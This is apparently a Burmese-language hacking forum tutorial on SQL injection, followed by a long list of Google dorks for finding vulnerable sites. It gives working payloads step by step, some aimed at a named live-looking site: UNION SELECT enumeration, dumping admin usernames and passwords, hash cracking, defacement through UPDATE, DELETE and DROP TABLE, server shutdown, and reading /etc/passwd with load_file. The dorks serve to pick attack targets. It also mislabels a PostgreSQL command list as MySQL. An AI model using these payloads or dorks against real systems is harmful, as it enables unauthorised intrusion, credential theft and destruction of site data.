ဒလလ
စမးတ႔ေနရာမြာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
[url=http://www.site.com/script.php?param=%]www.site.com/script.php?param=%[/url]
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
[url=http://www.site.com/script.php?param=Tex%]www.site.com/script.php?param=Tex%[/url
]
ဆၿပရြပါတယး.. အဆငးေၿပသလ စမးသပးႏငးပါတယး...
အကယး၍ ၄ငးရ႕ site က vulnerable မၿဖစးဘဆရငး ပမြနးအတငး page loading လပးသျာပါလမးမယး..
အ႔လမဟတးပ query string filtering မရြဘဆရငး "MySQL Syntax Error By '5'' In Article.php on line
15." သမဟတး Check the correct MySQL version သ႔မဟတး MySQL Fetch error သ႔မဟတးပါက
ဘာမြမေပၚပ page အၿဖၾကသာေပၚေနပါလမးမယး... ဒါဆရငး ဒ site က vulnerable ၿဖစးေနပါတယး
အကယး၍ ' ၿဖငး မရလြငး ေအာကးပါအတငး union select 1-- ဆတာကသႏငးပါတယး။
www.site.com/article.php?id=5
union select 1--
In ASP
==>>
အထကးပါနညးအတငး
http://www.site.com/index.asp?id=5
ဆရငး
ေနာကးက ' (apostrophe) ေလထညးၿပစမးႏငးပါတယး။
http://www.site.com/index.asp?id=5'
ဒါဆရငး
Microsoft
OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC
SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'table1' to a column of data type int.
/index.asp, line 5
ဆတ႔
error မေပၚေနတတးၿပ ASP, JSP, CGI, န႔ PHP web pages ေတျမြာ
စမးသပးႏငးပါတယး။
အကယး၍ URL မြာ မေပၚတ႔ parameters မဆရငး ၄ငးတ႔ရ႕ login page, search page, feedback
လေနရာမေတျက ရြာႏငးပါတယး.. တစးခ႕ html page ေတျက POST command န႔ ASP page က
ပ႔ေဆာငးေပတ႔ parameters သထာတတးပါတယး.. ဒါဆရငးေတာ ၄ငးတ႔ရ႕ HTML source code ထက
ငးေရာကးပါ။ ၿပရငး "FORM" tag ကရြာလကးပါ ...
ဥပမာ
<FORM action=Search/search.asp
method=post>
<input type=hidden name=A value=C>
</FORM>
ဒ <FORM></FORM>
ႏြစးခၾကာက ၿဖစးႏငးေၿခေတျပါ။
<FORM
action=http://duck/Search/search.asp method=post>
<input
type=hidden name=A
value='a' or 1=1--">
</FORM>
value မြာ အေပၚကအတငး BYPASSING LOGINS မြာသသလ စမးသပးၿပရြာေဖျႏငးပါတယး။
---Columns
အေရအတျကးရြာေဖျၿခငး---
‘order by’ ကအသၿပၿပ Columns မာက ရြာေဖျမြာၿဖစးပါတယး.. URL query ကေအာကးပါတငး
ရကးထညးလကးပါမယး... '/*' သ႔မဟတး '--" ဆတာေလသလ႔ရပါတယး..
www.site.com/article.php?id=5 order by 1/*
အမြာမေပၚဘဆရငး ေနာကးတစးခါ 2 ဆၿပတကာ ရကးထညးပါမယး
www.site.com/article.php?id=5 order by 2/*
ယခအခနးအထ
အမြာမေပၚေသဘဆရငး ေနာကးတစး ထပးၿပတပါမယး.. ဒလတတၿပ
အမြာေပၚလာတ႔အထ ရြာေဖျရမြာၿဖစးပါတယး...
www.site.com/article.php?id=5 order by 3/*
အခ 3 ကေရာကးတ႔အခါ အမြာေတျ႔တယးဆရငး ဒါဆရငး ကၽျနးေတားတ႔ Columns ႏြစးခရြတယးဆတာ
သသျာပါၿပ... ဒလနညးန႔ Column ေတျက တစးဆငးၿခငးရြာေဖျရပါတယး...
ေနာကးတစးခ ပန႔ တကျ ရြာေဖျၾကညးရေအာငး
http://sbisa.org/circle.php?id=26
ကၾကညးမယး..
http://sbisa.org/circle.php?id=26
ရ႕ value ေနာကးမြာ ' ဆတ႔ (apostrophe) တစးခထညးလကးပါမယး..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/sbisaor/public_html/circle.php on line 10 ဆတ႔ error
တစးခေတျ႔ပါလမးမယး..
ဒါဆရငးေသခာတယး.. SQL error တစးခတကးေနၿပ... တတကကေၿပာရရငး DB Server က MySQL
OK, ဒါဆရငး ကၽျနးေတားတ႔ Columns အေရအတျကးရြာမယး...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒအထအဆငးအဆငးရြာတယး... error
မၿဖစးေသဘ
7 အထေရာကးတ႔အခါမြာေတာ error ေတျ႔တယးဆရငး ဒါဟာ 6 Columns ရြတယး...
ဒါဆရငးေနာကးထပး UNION SELECT ALL ဆတ႔ statement တစးခကသမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆၿပရကးထညးလကးမယး..
ဒါဆရငး 2,3,4 ဆတာၿပမယး.. ဒအပငးေတျက data ေတျသမးဆညးထာတ႔ Columns ေတျၿဖစးတယး...
---MySQL version ရြာၿခငး---
ဒ Injection မြာ MySQL Version က checking လပးဖ႔လပါတယး... . Version အာ Checking လပးရနး
@@version သ႔မဟတး version() functions ေတျကသေပရပါမယး.. အခ @@version က
data ေတျသမးဆညးထာတ႔ column မြာထညးၿပ MySQL version ကစစးမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သ႔မဟတး
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကသႏငးပါတယး.. တခါတစးေလမြာ အထကးပါနညးအတငးက error ေတျၿဖစးတတးတ႔အတျကး unhex(hex())
ကသေပရပါမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆရငး Server မြာ အသၿပေနတ႔ MySQL ရ႕ version ကေဖားၿပေပသျာပါလမးမယး...
အကယး၍ user တ႔ ၊ database တ႔က check ခငးတယးဆရငး ေအာကးပါတငး checking
လပးႏငးပါတယး..
www.site.com/article.php?id=5 UNION ALL SELECT
user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT
database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
---MySQL 5 ႏြငးအထကး injection---
အခကၽျနးေတားတ႔ ရတာ MySQL version 5.0.90 ၿဖစးပါတယး... MySQL version 5 မြာ
information_schema ဆတ႔ အသငးတ႔ funtion တစးခပါငးၿပ ၄ငးက လကးရြ DB server ရ႕ tables န႔
columns ေတျက ထနးသမးထာတာၿဖစးပါတယး...
Tables ေတျကရယရနး table_name from information_schema.tables ဆတာကသသလ
Columns ေတျကရယရနး column_name from information_schema.columns
ဆတာကသရပါမယး..
ေနာကးတစးခကေတာ ဒ site အေပၚမြာ ၿမငးရေအာငးလ႔
group_concat(table_name) က Tables ေတျအတျကးန႔
group_concat(column_name)က Columns ေတျအတျကးသေပရပါတယး...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from
information_schema.tables where table_schema=database()--
ေစာေစာက ကၽျနးေတားတ႔ MySQL version က @@version အစာ unhex(hex()) န႔သခ႔ရတယးဆရငး အခ
Table န႔ Column ကရြာတ႔အခါမြာလညး အ႔လပ သေပရပါတယး။
http://sbisa.org/circle.php?id=-26 union select all
1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where
table_schema=database()--
ေနာကးထကးတစးခါ ကၽျနးေတားတ႔ Columns ေတျကၾကညးမယးဆရငး
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from
information_schema.columns where table_schema=database()--
ဒါဆရငး DB ထက table ေတျက ေဖားၿပေပပါၿပ... အခ ကၽျနးေတားတ႔ဒ tables ေလေတျက စနစးတက
မြတးသာထာပါမယး... ေနာကးတစးဆငးတကးကာ ကၽျနးေတားတ႔လခငးတ႔ user name န႔ password ေတျ
သမးထာတ႔ table ကၾကညးပါမယး...
group_concat ကပ ဆကးလကးသပါမယး.. ဒါေပမ႔ ကၽျနးေတားတ႔ လခငးတ႔ username,
password ေတျသမးထာေလာကးတ႔ columns ေတျထက စစးထတးယမြာပါ။ ဒေနရာမြာ ကၽျနးေတားတ႔
မြနးထာတ႔ table အမညးက from information_schema.tables
where table_schema=database-- ေနရာမြာ ထညးသျငးမြာၿဖစးပါတယး..
0x3a ဆတာကေတာ ":" ရ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all
1,2,3,group_concat(username,0x3a,password),5,6 from
admin--
ဒါဆရငးေတာ မမတ႔လခငးတ႔ username န႔ password ကရသျာပါၿပ... ရရြထာတ႔
password ဟာ plaintext ၿဖစးတယးဆရငးေတာ ထပးၿပေခါငးရႈပးစရာမလေတာဘေပါ႔
တစးခ႕ကေတာ password hashed လပးထာတ႔ အတျကး ၄ငးတ႔အာ hash cracker ေတျန႔
ေၿဖထတးေပရပါလမးမယး..
ဥပမာ
admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain
& Able
www.oxid.it
hash လပးထာတ႔ password ေတျသာဆရငးေတာ အနညးငယးခကးသျာပါလမးမယး... အထကးပါ hash က
crack လပးလကးရငး adminlanetCreator ဆၿပရပါမယး..
က ဒါဆရငးေတာ admin န႔ password ကရၿပဆရငး ကယးလပးခငးသလလပးေပေတာ..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစးမယးဆရငး version 5 လ information_schema.tables and
information_schema.columns က support မလပးတ႔အတျကး table name န႔ column name ေတျက
guess လပးရပါတယး... ေနာကးတစးခက error message အေပၚမြာအေၿခခၿပခနး႔မြနးရတာပါ။ The error
reports pnc_article in the error ဆရငး pnc ဆတ႔ prefix ကသထာတ႔အတျကး table name က pnc
ဆတာ ခနး႔မြနးလ႔ရႏငးပါတယး။
ဥပမာ ကၽျနးေတားက table name က user ဆၿပ ခနး႔မြနးလကးမယး.. ဒါဆရငး
ေအာကးပါအတငးရကးထညးေပၾကညးမယးဆပါစ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထကးပါအတငးရကးထညးလကးလ႔ error ၿဖစးေနတယးဆရငး ဒါဟာ table မရြလပ... ေနာကးတစးခါထပးၿပ
guess လကးပါ... table name က tbluser ဆၿပထာလကးပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒလနညးန႔ table name ေတျ column ေတျအာ ခနး႔မြနးၿပထညးသျာရပါလမးမယး...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM
tbluser/*
ေနာကးဆ username န႔ password က ရတ႔အထေပါ႔...
Table name အခ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရ႕ လ႕ ြကးထာတ႔ Data မာက ရယတ႔အပငးၿဖစးပါတယး... Admin ရ႕ username &
password ရၿပဆရငး Admin Login Page မြာရကးထညးရပါမယး... Joomla ဆရငး /administrator န႔
Wordpress ဆရငး /wp-admin ၿဖစးပါတယး.. အခ႕ site ေတျက admin panel ကရြာရခကး ေနပါလမးမယး..
ဒါဆရငး admin panel finder ေလေတျကသၿပရြာေဖျရပါလမးမယး...
Admin Panel Finder
http://www.planetcreator.net/planetc...inpanelfinder/
န႔ရြာႏငးပါတယး။
---Site အာၿပငးဆငးၿခငး ---
အခ႕ေသာ Site ေတျက admin ရ႕ password ကရေပမ႔ admin panel ကရဖ႔ခကးခၿခငး၊ ရြာမေတျ႔ၿခငးေတျန႔
ၾကရတတးပါတယး... ဒလေနရာမြာ SQL commands ေတျကသၿပ အထက site ရ႕ contents
ေတျကၿပငးဆငးေၿပသျာရမြာၿဖစးပါတယး...
ဒါေလေတျက အေရပါတ႔ command ေလေတျပါ
UPDATE:It is used to edit infos already in the db without deleting any rows.
DELETE:It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE:-
www.site.com/article.php?id=5
ဆၾကပါစ႔ကၽျနးေတားတ႔ရ႕ query က ေအာကးပါအတငးၿဖစးမယးဆရငး
SELECT title,data,author FROM article WHERE id=5
(table name န႔ column ေတျက အထကးပါအတငးရြာေဖျက ထညးေပရတာၿဖစးပါတယး) ေအာကးပါအတငး
site ကၿပငးေပသျာပါမယး...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခကးဆနးဆနးေလ ထကးၿပ အရစးတကးလကးမယးဆရငး
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY
SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတးမြတးထာတ႔ page ေၿပာငးလၿပ update လပးခငးတယးဆရငးေတာ ေအာကးပါအတငး
ရကးထညးေပရပါတယး..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value
3' WHERE id=5/*
DELETE:- DB Server ထကေန အၿမတမးဖကးပစးေတာမယးဆရငး DELETE command ကသသျာပါမယး..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတးမြတးထာတ႔ page က delete လပးခငးတယးဆရငး ေအာကးပါ table name ရ႕ ေနာကးထမြ WHERE န႔
page id ကထညးသျငးသျာရပါမယး...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒတစးခကေတာ DROP TABLE ပါ... Table အလကး ဖကးခငးတယး ဆရငးေတာ DROP Table န႔
table name ကဆၿပသပါမယး...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒအတငးဖကးရငး table ေတျေကာ အထမြာပါတ႔ contents ေတျေကာ အာလ ပကးသျာပါလမးမယး...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထက .htaccess, .htpasswd ေတျန႔ password files ေတျၿဖစးတ႔ etc/passwd စသညး
ဖငးေတျက ယခငးတယးဆရငးေတာ LOADFILE ကသရပါတယး... ဒါကအသေတာနညးပါတယး....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယး၍ hex ေတျန႔ဆရငးေတာ ေအာကးပါတငး သပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT
load_file(0x272F6574632F70617373776427)
ဒါက Hex based SQL Injection လ႔လညးေခၚႏငးပါတယး..
* SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရ႕ c:\boot.ini က
ဆျယေပပါလမးမယး..
---MySQL ROOT---
MySQL
version 5 န႔အထကးမြာ mysql.user ဆတ႔ table တစးခဟာ MySQL servers
ေတျမြာရြပါတယး... အထမြာ hash လပးထာတ႔ Password န႔ username ေတျပါ ငးပါတယး... ၄ငးအထက
hash ဟာ mysqlsha1 ၿဖစးတ႔အတျကး John The Ripper န႔ crack လပးဖ႔ခကးပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from
mysql.user/*
ဒအတျကး InsidePro Password Recovery Software ကသလ႔ရပါတယး..
http://www.insidepro.com
---အသငးတ႔ MySQL commands အခ႕ပါ..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier
of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a databasee
SQL
Injection မြာ အသၿပတ႔ အေၿခခေတျပ ရြပါေသတယး... ဒထကးမာတ႔ functions ေတျအမာၾကရြသလ
ဒထကးပၿပနကးနတ႔ အသၿပပေတျရြပါတယး... ေလလာတ႔သေတျအေနန႔ မမတ႔ကယးတငး SQL commands
ေတျက အရငးဆ ကယးတငးစမးစစးၿပ မမတ႔ရ႕ SQL commands အသၿပမႈအရညးအခငးက
ၿမငးတငးသငးပါတယး။
-----------------------------------------------------------------------------------------------------------------
ဒေလာကးဆရငး SQL Injection သေဘာတရာေတျကနာလညးေလာကးပထငးပါတယး။
နးခခကး - အထကးပါ SQL Injection စာမာက က BrB (planet creator)ထမြတကးရကးကယထာပါသညး
SQL Error ဖစးေနေသာ Website မာရြာနညး
SQL ယေပါကး Vuln ရြေနတဆကးေတျက Google Dork သပရြာနငးပါတယး။Dork ဆတာ ကေနားတလအပး
တ Result ေတျက တစတေထမြာသသသနးသနးတရာစပရြာေပတ ကးဆကးရြာစာသာလေပာရမလာပ။
ကေနားေအာကးမြာ Dork ေတျ အမာႀကစေပထာပါတယး။ရြာပ SQL Error ဖစးေနတ ဆကးတစးခက
Target ထာကာ က Brb ရနညးဖစးဖစး၊အခာနညးမာဖစးဖစးန Attack လပးနငးပါတယး။
Google Dork For SQL Injection မာစစညးမြ
by 3thic0kiddi3
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id= inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
